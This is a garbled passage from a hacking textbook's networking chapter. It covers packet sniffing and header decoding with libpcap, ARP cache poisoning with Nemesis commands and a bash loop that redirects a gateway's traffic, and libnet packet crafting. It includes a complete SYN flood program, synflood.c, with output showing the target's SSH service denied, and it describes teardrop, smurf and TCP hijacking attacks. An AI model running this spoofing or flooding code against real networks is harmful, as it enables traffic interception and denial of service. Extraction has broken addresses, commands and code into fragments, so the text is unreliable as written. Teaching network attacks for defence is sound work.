text+0x2c2): undefined reference to `pcap_close'
collect2: ld returned 1 exit status
reader@hacking:~/booksrc $ gcc -o pcap_sniff pcap_sniff
...
/pcap_sniff
Fatal Error in pcap_lookupdev: no suitable device found
reader@hacking:~/booksrc $ sudo
...
l
...
e
...

00 44 1e 39 40 00 40 06 46 20 c0 a8 2a 01 c0 a8 |
...
9@
...

2a f9 8b 12 1e d2 ac 14 cf c7 e5 10 6c c9 80 18 | *
...

05 b4 54 1a 00 00 01 01 08 0a 26 b6 a7 76 02 3c |
...
v
...
this is a test
0d 0a
|
...
e
...
P
...

00 34 3d 2c 40 00 40 06 27 4d c0 a8 2a f9 c0 a8 |
...
'M
...
l
...
G'l&
...
v
15
1d
d7
0a
41

65
c0
e5
26
41

b6
a8
10
b6
41

08
2a
6c
a9
41

00
01
c9
c8
41

45
c0
80
02
41

10
a8
18
47
41

|
|
|
|
|
|

...
P
...
E
...
F
...

*
...

...

Notice that there are many bytes preceding the sample text in the packet
and many of these bytes are similar
...

0x443 Decoding the Layers
In our packet captures, the outermost layer is Ethernet, which is also the
lowest visible layer
...
The header for this layer contains the source
MAC address, the destination MAC address, and a 16-bit value that describes
the type of Ethernet packet
...
h and the structures for the IP header and
TCP header are located in /usr/include/netinet/ip
...
h, respectively
...
A better understanding can be gained from writing our own
structures, so let’s use the structure definitions as guidance to create our
own packet header structures to include in hacking-network
...

First, let’s look at the existing definition of the Ethernet header
...
h
#define ETH_ALEN
#define ETH_HLEN

6
14

/* Octets in one ethernet addr
/* Total octets in header */

*/

/*
* This is an Ethernet frame header
...
The
variable declaration of __be16 turns out to be a type definition for a 16-bit
unsigned short integer
...

230

0x 400

reader@hacking:~/booksrc $
$ grep -R "typedef
...
h:typedef __u16 __bitwise __be16;
$ grep -R "typedef
...
h:typedef unsigned short __u16;
/usr/include/linux/cramfs_fs
...
h:typedef unsigned short __u16;
$

The include file also defines the Ethernet header length in ETH_HLEN as
14 bytes
...
However, many compilers will pad structures along 4-byte boundaries
for alignment, which means that sizeof(struct ethhdr) would return an
incorrect size
...

By including ...
Since we want to make
our own structures for hacking-network
...
While we’re at it, let’s give these fields better names
...
h
#define ETHER_ADDR_LEN 6
#define ETHER_HDR_LEN 14
struct ether_hdr {
unsigned char ether_dest_addr[ETHER_ADDR_LEN]; // Destination MAC address
unsigned char ether_src_addr[ETHER_ADDR_LEN]; // Source MAC address
unsigned short ether_type; // Type of Ethernet packet
};

We can do the same thing with the IP and TCP structures, using the
corresponding structures and RFC diagrams as a reference
...
h
struct iphdr
{
#if __BYTE_ORDER == __LITTLE_ENDIAN
unsigned int ihl:4;
unsigned int version:4;
#elif __BYTE_ORDER == __BIG_ENDIAN
unsigned int version:4;
unsigned int ihl:4;
#else
# error "Please fix ...
*/
};

From RFC 791
0
1
2
3
0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|Version| IHL |Type of Service|
Total Length
|
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|
Identification
|Flags|
Fragment Offset
|
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Time to Live |
Protocol
|
Header Checksum
|
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|
Source Address
|
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|
Destination Address
|
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|
Options
|
Padding
|
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
Example Internet Datagram Header

Each element in the structure corresponds to the fields shown in the
RFC header diagram
...
These fields are in the network byte order, so,
if the host is little-endian, the IHL should come before Version since the byte
order is reversed
...

Added to hacking-network
...
IP headers are always
20 bytes
...
h
for the structure and RFC 793 for the header diagram
...
h
typedef u_int32_t tcp_seq;
/*
* TCP header
...

*/
struct tcphdr
{
u_int16_t th_sport; /* source port */
u_int16_t th_dport; /* destination port */
tcp_seq th_seq;
/* sequence number */
tcp_seq th_ack;
/* acknowledgment number */
# if __BYTE_ORDER == __LITTLE_ENDIAN
u_int8_t th_x2:4;
/* (unused) */
u_int8_t th_off:4;
/* data offset */
# endif
# if __BYTE_ORDER == __BIG_ENDIAN
u_int8_t th_off:4;
/* data offset */
u_int8_t th_x2:4;
/* (unused) */
# endif
u_int8_t th_flags;
# define TH_FIN 0x01
# define TH_SYN 0x02
# define TH_RST 0x04
# define TH_PUSH 0x08
# define TH_ACK 0x10
# define TH_URG 0x20
u_int16_t th_win;
/* window */
u_int16_t th_sum;
/* checksum */
u_int16_t th_urp;
/* urgent pointer */
};

From RFC 793
TCP Header Format
0
1
2
3
0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|
Source Port
|
Destination Port
|
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|
Sequence Number
|
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|
Acknowledgment Number
|
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

N et wor kin g

233

| Data |
|U|A|P|R|S|F|
|
| Offset| Reserved |R|C|S|S|Y|I|
Window
|
|
|
|G|K|H|T|N|N|
|
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|
Checksum
|
Urgent Pointer
|
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|
Options
|
Padding
|
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|
data
|
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
Data Offset: 4 bits
The number of 32 bit words in the TCP Header
...
The TCP header (even one including options) is an
integral number of 32 bits long
...
Must be zero
...
The data offset field is important, since it tells the size of the variablelength TCP header
...
This is because the RFC defines this
field as optional
...
So the TCP
header size in bytes equals the data offset field from the header times four
...

The th_flags field of Linux’s tcphdr structure is defined as an 8-bit unsigned
character
...

Added to hacking-network
...
But before we do, let’s talk
about libpcap for a moment
...
Very few programs actually use pcap_next() , because it’s clumsy and
inefficient
...
This means
the pcap_loop() function is passed a function pointer, which is called every
time a packet is captured
...
If the count argument is set to -1, it will loop until the program
breaks out of it
...
Naturally, the callback function needs to
follow a certain prototype, since pcap_loop() must call this function
...
It can be used to pass additional information to the
callback function, but we aren’t going to be using this
...

The following example code uses pcap_loop() with a callback function to
capture packets and our header structures to decode them
...

decode_sniff
...
h>
#include "hacking
...
h"
void pcap_fatal(const char *, const char *);
void decode_ethernet(const u_char *);
void decode_ip(const u_char *);
u_int decode_tcp(const u_char *);
void caught_packet(u_char *, const struct pcap_pkthdr *, const u_char *);
int main() {
struct pcap_pkthdr cap_header;
const u_char *packet, *pkt_data;
char errbuf[PCAP_ERRBUF_SIZE];
char *device;

N et wor kin g

235

pcap_t *pcap_handle;
device = pcap_lookupdev(errbuf);
if(device == NULL)
pcap_fatal("pcap_lookupdev", errbuf);
printf("Sniffing on device %s\n", device);
pcap_handle = pcap_open_live(device, 4096, 1, 0, errbuf);
if(pcap_handle == NULL)
pcap_fatal("pcap_open_live", errbuf);
pcap_loop(pcap_handle, 3, caught_packet, NULL);
pcap_close(pcap_handle);
}

At the beginning of this program, the prototype for the callback function, called caught_packet(), is declared along with several decoding functions
...
This function is passed the
pcap_handle, told to capture three packets, and pointed to the callback function, caught_packet()
...
Also, notice that the decode_tcp()
function returns a u_int
...

void caught_packet(u_char *user_args, const struct pcap_pkthdr *cap_header, const u_char
*packet) {
int tcp_header_length, total_header_size, pkt_data_len;
u_char *pkt_data;
printf("==== Got a %d byte packet ====\n", cap_header->len);

decode_ethernet(packet);
decode_ip(packet+ETHER_HDR_LEN);
tcp_header_length = decode_tcp(packet+ETHER_HDR_LEN+sizeof(struct ip_hdr));
total_header_size = ETHER_HDR_LEN+sizeof(struct ip_hdr)+tcp_header_length;
pkt_data = (u_char *)packet + total_header_size; // pkt_data points to the data portion
...
This function uses the header lengths to split the packet up by layers
and the decoding functions to print out details of each layer’s header
...
This allows accessing various
fields of the header, but it’s important to remember these values will be in
network byte order
...

reader@hacking:~/booksrc $ gcc -o decode_sniff decode_sniff
...
/decode_sniff
Sniffing on device eth0
==== Got a 75 byte packet ====
[[ Layer 2 :: Ethernet Header ]]
[ Source: 00:01:29:15:65:b6
Dest: 00:01:6c:eb:1d:50 Type: 8 ]
(( Layer 3 ::: IP Header ))
( Source: 192
...
42
...
168
...
249 )
( Type: 6
ID: 7755
Length: 61 )
{{ Layer 4 :::: TCP Header }}
{ Src Port: 35602
Dest Port: 7890 }
{ Seq #: 2887045274
Ack #: 3843058889 }
{ Header Size: 32
Flags: PUSH ACK }
9 bytes of packet data
74 65 73 74 69 6e 67 0d 0a
| testing
...
168
...
249
Dest: 192
...
42
...
168
...
1 Dest: 192
...
42
...

reader@hacking:~/booksrc $

238

0x 400

With the headers decoded and separated into layers, the TCP/IP connection is much easier to understand
...
Also, notice how the sequence number in the two packets
from 192
...
42
...

This is used by the TCP protocol to make sure all of the data arrives in order,
since packets could be delayed for various reasons
...
Protocols such as
FTP, POP3, and telnet transmit data without encryption
...
From a security perspective, this isn’t too good,
so more intelligent switches provide switched network environments
...
This requires
more intelligent hardware that can create and maintain a table associating
MAC addresses with certain ports, depending on which device is connected
to each port, as illustrated here
...
But even in a switched environment, there are
clever ways to sniff other devices’ packets; they just tend to be a bit more
complex
...

One important aspect of network communications that can be manipulated for interesting effects is the source address
...
The act of forging a source address in a packet
is known as spoofing
...

Port 1 00:00:00:AA:AA:AA
Port 2 00:00:00:BB:BB:BB
Port 3 00:00:00:CC:CC:CC
Switch
1

2

3

00:00:00:AA:AA:AA

00:00:00:BB:BB:BB

00:00:00:CC:CC:CC

N et wor kin g

239

Spoofing is the first step in sniffing packets on a switched network
...
First, when an ARP reply comes
in with an IP address that already exists in the ARP cache, the receiving system
will overwrite the prior MAC address information with the new information
found in the reply (unless that entry in the ARP cache was explicitly marked
as permanent)
...
This means systems will accept an ARP reply even
if they didn’t send out an ARP request
...
The attacker sends spoofed ARP replies to certain devices that cause
the ARP cache entries to be overwritten with the attacker’s data
...
In order to sniff network traffic between
two points, A and B, the attacker needs to poison the ARP cache of A to
cause A to believe that B’s IP address is at the attacker’s MAC address, and
also poison the ARP cache of B to cause B to believe that A’s IP address is also
at the attacker’s MAC address
...
After that, all
of the traffic between A and B still gets delivered, but it all flows through the
attacker’s machine, as shown here
...
168
...
100
MAC: 00:00:00:AA:AA:AA

System B
IP: 192
...
0
...
168
...
200 at 00:00:00:FA:CA:DE

Internal ARP cache
192
...
0
...
168
...
137
MAC: 00:00:00:FA:CA:DE
Internal ARP cache
192
...
0
...
168
...
22 at 00:00:00:BB:BB:BB

Traffic to A
Traffic to B

Since A and B are wrapping their own Ethernet headers on their packets
based on their respective ARP caches, A’s IP traffic meant for B is actually sent
to the attacker’s MAC address, and vice versa
...
Then the attacker rewraps the IP packets with the proper Ethernet
headers and sends them back to the switch, where they are finally routed to
their proper destination
...

240

0x 400

Due to timeout values, the victim machines will periodically send out real
ARP requests and receive real ARP replies in response
...
A simple way to accomplish this is to send spoofed ARP replies to
both A and B at a constant interval—for example, every 10 seconds
...
ARP redirection is particularly interesting when one of the victim
machines is the default gateway, since the traffic between the default gateway
and another system is that system’s Internet traffic
...
168
...
118 is communicating with the gateway at 192
...
0
...
This means that this
traffic cannot normally be sniffed, even in promiscuous mode
...

To redirect the traffic, first the MAC addresses of 192
...
0
...
168
...
1 need to be determined
...
If you run a sniffer, you can
see the ARP communications, but the OS will cache the resulting IP/MAC
address associations
...
168
...
1
PING 192
...
0
...
168
...
1): 56 octets data
64 octets from 192
...
0
...
4 ms
--- 192
...
0
...
4/0
...
4 ms
reader@hacking:~/booksrc $ ping -c 1 -w 1 192
...
0
...
168
...
118 (192
...
0
...
168
...
118: icmp_seq=0 ttl=128 time=0
...
168
...
118 ping statistics --1 packets transmitted, 1 packets received, 0% packet loss
round-trip min/avg/max = 0
...
4/0
...
168
...
1) at 00:50:18:00:0F:01 [ether] on eth0
? (192
...
0
...
168
...
193 Bcast:192
...
0
...
255
...
0
UP BROADCAST NOTRAILERS RUNNING MTU:1500 Metric:1
RX packets:4153 errors:0 dropped:0 overruns:0 frame:0
TX packets:3875 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:100
RX bytes:601686 (587
...
8 Kb)
Interrupt:9 Base address:0xc000
reader@hacking:~/booksrc $

After pinging, the MAC addresses for both 192
...
0
...
168
...
1
are in the attacker’s ARP cache
...
Assuming IP
forwarding capabilities are compiled into the kernel, all we need to do is
send some spoofed ARP replies at regular intervals
...
168
...
118 needs to
be told that 192
...
0
...
168
...
1 needs to be
N et wor kin g

241

told that 192
...
0
...
These spoofed ARP packets
can be injected using a command-line packet injection tool called Nemesis
...
4, all functionality has been rolled up into a single
utility by the new maintainer and developer, Jeff Nathan
...
4/, and it has already
been built and installed
...
4 (Build 26)
NEMESIS Usage:
nemesis [mode] [options]
NEMESIS modes:
arp
dns
ethernet
icmp
igmp
ip
ospf (currently non-functional)
rip
tcp
udp
NEMESIS options:
To display options, specify a mode with the option "help"
...
4 (Build 26)
ARP/RARP Usage:
arp [-v (verbose)] [options]
ARP/RARP Options:
-S
-D
-h
-m
-s
-r ({ARP,RARP} REPLY enable)
-R (RARP enable)
-P
Data
-d
-H
-M

Link Options:

You must define a Source and Destination IP address
...
168
...
1 -D
192
...
0
...
4 (Build 26)
[MAC] 00:00:AD:D1:C7:ED > 00:C0:F0:79:3D:30
[Ethernet type] ARP (0x0806)
[Protocol addr:IP]
[Hardware addr:MAC]
[ARP opcode]
[ARP hardware fmt]
[ARP proto format]
[ARP protocol len]
[ARP hardware len]

192
...
0
...
168
...
118
00:00:AD:D1:C7:ED > 00:C0:F0:79:3D:30
Reply
Ethernet (1)
IP (0x0800)
6
4

Wrote 42 byte unicast ARP request packet through linktype DLT_EN10MB
ARP Packet Injected
reader@hacking:~/booksrc $ sudo nemesis arp -v -r -d eth0 -S 192
...
0
...
168
...
1 -h 00:00:AD:D1:C7:ED -m 00:50:18:00:0F:01 -H 00:00:AD:D1:C7:ED -M
00:50:18:00:0F:01
ARP/RARP Packet Injection -=- The NEMESIS Project Version 1
...
168
...
118 > 192
...
0
...

ARP Packet Injected
reader@hacking:~/booksrc $

These two commands spoof ARP replies from 192
...
0
...
168
...
118
and vice versa, both claiming that their MAC address is at the attacker’s MAC
address of 00:00:AD:D1:C7:ED
...
The standard BASH shell allows commands to be
scripted, using familiar control flow statements
...

reader@hacking:~/booksrc $ while true
> do

N et wor kin g

243

> sudo nemesis arp -v -r -d eth0 -S 192
...
0
...
168
...
118 -h
00:00:AD:D1:C7:ED -m 00:C0:F0:79:3D:30 -H 00:00:AD:D1:C7:ED -M
00:C0:F0:79:3D:30
> sudo nemesis arp -v -r -d eth0 -S 192
...
0
...
168
...
1 -h
00:00:AD:D1:C7:ED -m 00:50:18:00:0F:01 -H 00:00:AD:D1:C7:ED -M
00:50:18:00:0F:01
> echo "Redirecting
...
4 (Build 26)
[MAC] 00:00:AD:D1:C7:ED > 00:C0:F0:79:3D:30
[Ethernet type] ARP (0x0806)
[Protocol addr:IP] 192
...
0
...
168
...
118
[Hardware addr:MAC] 00:00:AD:D1:C7:ED > 00:C0:F0:79:3D:30
[ARP opcode] Reply
[ARP hardware fmt] Ethernet (1)
[ARP proto format] IP (0x0800)
[ARP protocol len] 6
[ARP hardware len] 4
Wrote 42 byte unicast ARP request packet through linktype DLT_EN10MB
...
4 (Build 26)
[MAC] 00:00:AD:D1:C7:ED > 00:50:18:00:0F:01
[Ethernet type] ARP (0x0806)
[Protocol addr:IP] 192
...
0
...
168
...
1
[Hardware addr:MAC] 00:00:AD:D1:C7:ED > 00:50:18:00:0F:01
[ARP opcode] Reply
[ARP hardware fmt] Ethernet (1)
[ARP proto format] IP (0x0800)
[ARP protocol len] 6
[ARP hardware len] 4
Wrote 42 byte unicast ARP request packet through linktype DLT_EN10MB
...

You can see how something as simple as Nemesis and the standard BASH
shell can be used to quickly hack together a network exploit
...
Similar to
libpcap, this library uses raw sockets and evens out the inconsistencies between
platforms with a standardized interface
...

The libnet library provides a simple and uniform API to craft and inject
network packets
...
A high-level glance at the source code for Nemesis shows how easy it
is to craft ARP packets using libnet
...
c contains
several functions for crafting and injecting ARP packets, using statically defined
244

0x 400

data structures for the packet header information
...
c to build and inject an ARP packet
...
c
static ETHERhdr etherhdr;
static ARPhdr arphdr;

...
h (shown
below) as aliases for existing libnet data structures
...

From nemesis
...
You can
probably guess that these functions initialize data, process command-line arguments, validate data, and do some sort of verbose reporting
...

The arp_initdata() function, shown below, sets various elements of the
header structures to the appropriate values for an ARP packet
...
c
static void arp_initdata(void)
{
/* defaults */
etherhdr
...
ether_shost, 0, 6);
/* Ethernet source address */
memset(etherhdr
...
ar_op = ARPOP_REQUEST;
/* ARP opcode: request */
arphdr
...
ar_pro = ETHERTYPE_IP;
/* protocol format: IP */
arphdr
...
ar_pln = 4;
/* 4 byte protocol addresses */
memset(arphdr
...
ar_spa, 0, 4);
/* ARP sender protocol (IP) addr */
memset(arphdr
...
ar_tpa, 0, 4);
/* ARP target protocol (IP) addr */
pd
...
file_s = 0;
return;
}

Finally, the nemesis_arp() function calls the function buildarp() with
pointers to the header data structures
...

This function is found in yet another source file, nemesis-proto_arp
...

From nemesis-proto_arp
...
\n", arp_packetlen);
printf("DEBUG: ARP payload size %u
...
\n");
return -1;
}
libnet_build_ethernet(eth->ether_dhost, eth->ether_shost, eth->ether_type,
NULL, 0, pkt);
libnet_build_arp(arp->ar_hrd, arp->ar_pro, arp->ar_hln, arp->ar_pln,
arp->ar_op, arp->ar_sha, arp->ar_spa, arp->ar_tha, arp->ar_tpa,
pd->file_mem, pd->file_s, pkt + LIBNET_ETH_H);
n = libnet_write_link_layer(l2, device, pkt, LIBNET_ETH_H +
LIBNET_ARP_H + pd->file_s);
if (verbose == 2)
nemesis_hexdump(pkt, arp_packetlen, HEX_ASCII_DECODE);
if (verbose == 3)
nemesis_hexdump(pkt, arp_packetlen, HEX_RAW_DECODE);
if (n != arp_packetlen)
{
fprintf(stderr, "ERROR: Incomplete packet injection
...
\n", n);
}
else
{
if (verbose)
{
if (memcmp(eth->ether_dhost, (void *)&one, 6))
{
printf("Wrote %d byte unicast ARP request packet through "
"linktype %s
...
\n", n,
N et wor kin g

247

(eth->ether_type == ETHERTYPE_ARP ? "ARP" : "RARP"),
nemesis_lookup_linktype(l2->linktype));
}
}
}
libnet_destroy_packet(&pkt);
if (l2 != NULL)
libnet_close_link_interface(l2);
return (n);
}

At a high level, this function should be readable to you
...
Then,
it builds the Ethernet layer using elements from the Ethernet header data
structure and then does the same for the ARP layer
...
The documentation for these functions from the libnet
man page is shown below for clarity
...
This is
required to write link layer frames
...
Returned is a
filled in libnet_link_int struct or NULL on error
...
If the size parameter is
omitted (or negative) the library will pick a reasonable value for the user
(currently LIBNET_MAX_PACKET)
...
If there is an error, the
function returns -1
...

libnet_build_ethernet() constructs an ethernet packet
...
The ethernet packet type should be one of the following:
Value
ETHERTYPE_PUP
ETHERTYPE_IP
ETHERTYPE_ARP
ETHERTYPE_REVARP
ETHERTYPE_VLAN
ETHERTYPE_LOOPBACK

Type
PUP protocol
IP protocol
ARP protocol
Reverse ARP protocol
IEEE VLAN tagging
Used to test interfaces

libnet_build_arp() constructs an ARP (Address Resolution Protocol) packet
...
Note that this function

248

0x 400

only builds ethernet/IP ARP packets, and consequently the first value should
be ARPHRD_ETHER
...

libnet_destroy_packet() frees the memory associated with the packet
...

Returned is 1 upon success or -1 on error
...
For example,
Dug Song provides a program called arpspoof, included with dsniff, that performs the ARP redirection attack
...
This is
an extremely effective way of sniffing traffic on a switch
...
g
...

OPTIONS
-i interface
Specify the interface to use
...

host

specified, all

Specify the host you wish to intercept packets for (usually the
local gateway)
...
org>

The magic of this program comes from its arp_send() function, which also
uses libnet to spoof packets
...
The use of structures and an error buffer should also
be familiar
...
c
static struct libnet_link_int *llif;
static struct ether_addr spoof_mac, target_mac;
static in_addr_t spoof_ip, target_ip;

...
These functions have descriptive names and are explained
in detail on the libnet man page
...
The function returns the MAC
success or 0 upon error (and errbuf

to a link layer interface struct, a
and an empty buffer to be used in case of
address of the specified interface upon
will contain a reason)
...
Upon success the function returns the IP address of the specified
interface in host-byte order or 0 upon error (and errbuf will contain a
reason)
...
If use_name is 1,
libnet_host_lookup() will attempt to resolve this IP address and return a
hostname, otherwise (or if the lookup fails), the function returns a dotteddecimal ASCII string
...
Programming libraries like libnet and libpcap have
plenty of documentation that explains all the details you may not be able to
divine from the source alone
...
After
all, there are many other libraries and a lot of existing source code that
uses them
...

Instead of trying to steal information, a DoS attack simply prevents access to
a service or resource
...

Denial of Service attacks that crash services are actually more similar to
program exploits than network-based exploits
...
A buffer overflow exploit
gone wrong will usually just crash the target program instead of directing the
execution flow to the injected shellcode
...
Crashing
DoS attacks like this are closely tied to a certain program and a certain version
...
Many of
these vulnerabilities have long since been patched on modern operating
systems, but it’s still useful to think about how these techniques might be
applied to different situations
...
Since TCP maintains
“reliable” connections, each connection needs to be tracked somewhere
...
A SYN flood uses spoofing to take
advantage of this limitation
...
Since a SYN packet is used to initiate a
TCP connection, the victim’s machine will send a SYN/ACK packet to the
spoofed address in response and wait for the expected ACK response
...
Since the spoofed source addresses don’t actually exist, the
ACK responses needed to remove these entries from the queue and complete
the connections never come
...

As long as the attacker continues to flood the victim’s system with spoofed
SYN packets, the victim’s backlog queue will remain full, making it nearly
impossible for real SYN packets to get to the system and initiate valid TCP/IP
connections
...
The example program below
uses libnet functions pulled from the source code and socket functions previously explained
...
The function
libnet_seed_prand() is used to seed the randomizer
...

synflood
...
h>
#define FLOOD_DELAY 5000 // Delay between packet injects by 5000 ms
...
x
...
x notation */
char *print_ip(u_long *ip_addr_ptr) {
return inet_ntoa( *((struct in_addr *)ip_addr_ptr) );
}

int main(int argc, char *argv[]) {
u_long dest_ip;
u_short dest_port;
u_char errbuf[LIBNET_ERRBUF_SIZE], *packet;
int opt, network, byte_count, packet_size = LIBNET_IP_H + LIBNET_TCP_H;
if(argc < 3)
{
printf("Usage:\n%s\t \n", argv[0]);
exit(1);
}

252

0x 400

dest_ip = libnet_name_resolve(argv[1], LIBNET_RESOLVE); // The host
dest_port = (u_short) atoi(argv[2]); // The port

network = libnet_open_raw_sock(IPPROTO_RAW); // Open network interface
...
-- this program must run
as root
...

if (packet == NULL)
libnet_error(LIBNET_ERR_FATAL, "can't initialize packet memory
...

printf("SYN Flooding port %d of %s
...

IP tos
IP ID (randomized)
Frag stuff
TTL (randomized)
Transport protocol
Source IP (randomized)
Destination IP
Payload (none)
Payload length
Packet header memory

libnet_build_tcp(libnet_get_prand(LIBNET_PRu16), // Source TCP port (random)
dest_port,
// Destination TCP port
libnet_get_prand(LIBNET_PRu32), // Sequence number (randomized)
libnet_get_prand(LIBNET_PRu32), // Acknowledgement number (randomized)
TH_SYN,
// Control flags (SYN flag set only)
libnet_get_prand(LIBNET_PRu16), // Window size (randomized)
0,
// Urgent pointer
NULL,
// Payload (none)
0,
// Payload length
packet + LIBNET_IP_H);
// Packet header memory
if (libnet_do_checksum(packet, IPPROTO_TCP, LIBNET_TCP_H) == -1)
libnet_error(LIBNET_ERR_FATAL, "can't compute checksum\n");
byte_count = libnet_write_ip(network, packet, packet_size); // Inject packet
...
(%d of %d
bytes)", byte_count, packet_size);
usleep(FLOOD_DELAY); // Wait for FLOOD_DELAY milliseconds
...

if (libnet_close_raw_sock(network) == -1) // Close the network interface
...
");
return 0;
}

This program uses a print_ip() function to handle converting the
u_long type, used by libnet to store IP addresses, to the struct type expected
by inet_ntoa()
...

The current release of libnet is version 1
...
0
...
0 version of
libnet, so this version is included in the LiveCD and this is also what we will
use in our synflood program
...
However, this isn’t quite enough information for the compiler, as the output below shows
...
c -lnet
In file included from synflood
...
h:87:2: #error "byte order has not been specified, you'll"
synflood
...
Included with libnet, a program called libnet-config will output
these flags
...

reader@hacking:~/booksrc $ gcc $(libnet-config --defines) -o synflood
synflood
...
/synflood
Usage:

...
/synflood 192
...
42
...
-- this program must run as root
...
/synflood 192
...
42
...
168
...
88
...
168
...
88 is a Windows XP machine
running an openssh server on port 22 via cygwin
...
While the program is running, legitimate connections cannot be made
to this port
...
168
...
88"
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), capture size 96 bytes
17:08:16
...
213
...
59
...
168
...
88
...
346907 IP 158
...
184
...
40565 > 192
...
42
...
22: S
139725579:139725579(0) win 64357
17:08:16
...
245
...
50
...
168
...
88
...
370492 IP 91
...
238
...
4814 > 192
...
42
...
22: S
685911671:685911671(0) win 62957
17:08:16
...
132
...
97
...
168
...
88
...
394909 IP 120
...
199
...
19452 > 192
...
42
...
22: S
1420507902:1420507902(0) win 53397
17:08:16
...
9
...
120
...
168
...
88
...
418494 IP 137
...
201
...
54665 > 192
...
42
...
22: S
1185734766:1185734766(0) win 57243
17:08:16
...
5
...
61
...
168
...
88
...
442911 IP 44
...
67
...
60484 > 192
...
42
...
22: S
1042470133:1042470133(0) win 7087
17:08:16
...
66
...
126
...
168
...
88
...
466493 IP 131
...
172
...
15390 > 192
...
42
...
22: S
2127701542:2127701542(0) win 23682
17:08:16
...
246
...
88
...
168
...
88
...
490908 IP 140
...
48
...
9179 > 192
...
42
...
22: S
1429854465:1429854465(0) win 2092
17:08:16
...
172
...
123
...
168
...
88
...
168
...
88
OpenSSH_4
...
9
...
168
...
88 [192
...
42
...

debug1: connect to address 192
...
42
...
168
...
88 port 22: Connection refused
reader@hacking:~/booksrc $

Some operating systems (for example, Linux) use a technique called
syncookies to try to prevent SYN flood attacks
...

N et wor kin g

255

The TCP connections don’t actually become active until the final ACK packet
for the TCP handshake is checked
...
This helps prevent
spoofed connection attempts, since the ACK packet requires information to
be sent to the source address of the initial SYN packet
...
The data portion
of ICMP packets is commonly overlooked, since the important information is
in the header
...
An ICMP echo message of this gargantuan size became affectionately known as “The Ping of Death
...
It should be easy for you to write a program using
libnet that can perform this attack; however, it won’t be that useful in the
real world
...

However, history tends to repeat itself
...
The Bluetooth protocol, commonly used with
phones, has a similar ping packet on the L2CAP layer, which is also used to
measure the communication time on established links
...
Adam
Laurie, Marcel Holtmann, and Martin Herfurt have dubbed this attack
Bluesmack and have released source code by the same name that performs
this attack
...
Teardrop exploited another weakness in several vendors’ implementations of IP fragmentation reassembly
...
The teardrop attack sent packet fragments with overlapping
offsets, which caused implementations that didn’t check for this irregular
condition to inevitably crash
...
Although not limited to a Denial
of Service, a recent remote exploit in the OpenBSD kernel (which prides
itself on security) had to do with fragmented IPv6 packets
...
Often, the same mistakes made in the
past are repeated by early implementations of new products
...
Similar attacks can tie up other
resources, such as CPU cycles and system processes, but a flooding attack
specifically tries to tie up a network resource
...
The goal is to use up
the victim’s bandwidth so that legitimate traffic can’t get through
...

There’s nothing really clever about this attack—it’s just a battle of bandwidth
...

0x455 Amplification Attacks
There are actually some clever ways to perform a ping flood without using
massive amounts of bandwidth
...

First, a target amplification system must be found
...
Then the attacker sends large ICMP echo request
packets to the broadcast address of the amplification network, with a spoofed
source address of the victim’s system
...
e
...

This amplification of traffic allows the attacker to send a relatively small
stream of ICMP echo request packets out, while the victim gets swamped with
up to a couple hundred times as many ICMP echo reply packets
...
These techniques
are known as smurf and fraggle attacks, respectively
...
Since bandwidth consumption is the goal of a flooding DoS attack,
the more bandwidth the attacker is able to work with, the more damage they
can do
...
Systems installed with such software are
commonly referred to as bots and make up what is known as a botnet
...
The
attacker uses some sort of a controlling program, and all of the bots simultaneously attack the victim with some form of flooding DoS attack
...

0x460

TCP/IP Hijacking
TCP/IP hijacking is a clever technique that uses spoofed packets to take over a
connection between a victim and a host machine
...
A one-time password can be used to authenticate once and only once,
which means that sniffing the authentication is useless for the attacker
...
By sniffing the local network segment, all of the details
of open TCP connections can be pulled from the headers
...
This sequence
number is incremented with each packet sent to ensure that packets are
received in the correct order
...
Then the attacker sends a
spoofed packet from the victim’s IP address to the host machine, using the
sniffed sequence number to provide the proper acknowledgment number,
as shown here
...
168
...
100

src : 192
...
0
...
168
...
200
seq #: 1429775000
ack #: 1250510000
len : 24

src : 192
...
0
...
168
...
100
seq #: 1250510000
ack #: 1429775024
len : 167

Attacker
system

258

0x 400

System B
192
...
0
...
168
...
100
dst : 192
...
0
...

0x461 RST Hijacking
A very simple form of TCP/IP hijacking involves injecting an authentic-looking
reset (RST) packet
...

Imagine a program to perform this attack on a target IP
...
Such a
program doesn’t need to look at every packet but only at established TCP
connections to the target IP
...
This filter, known as a Berkeley
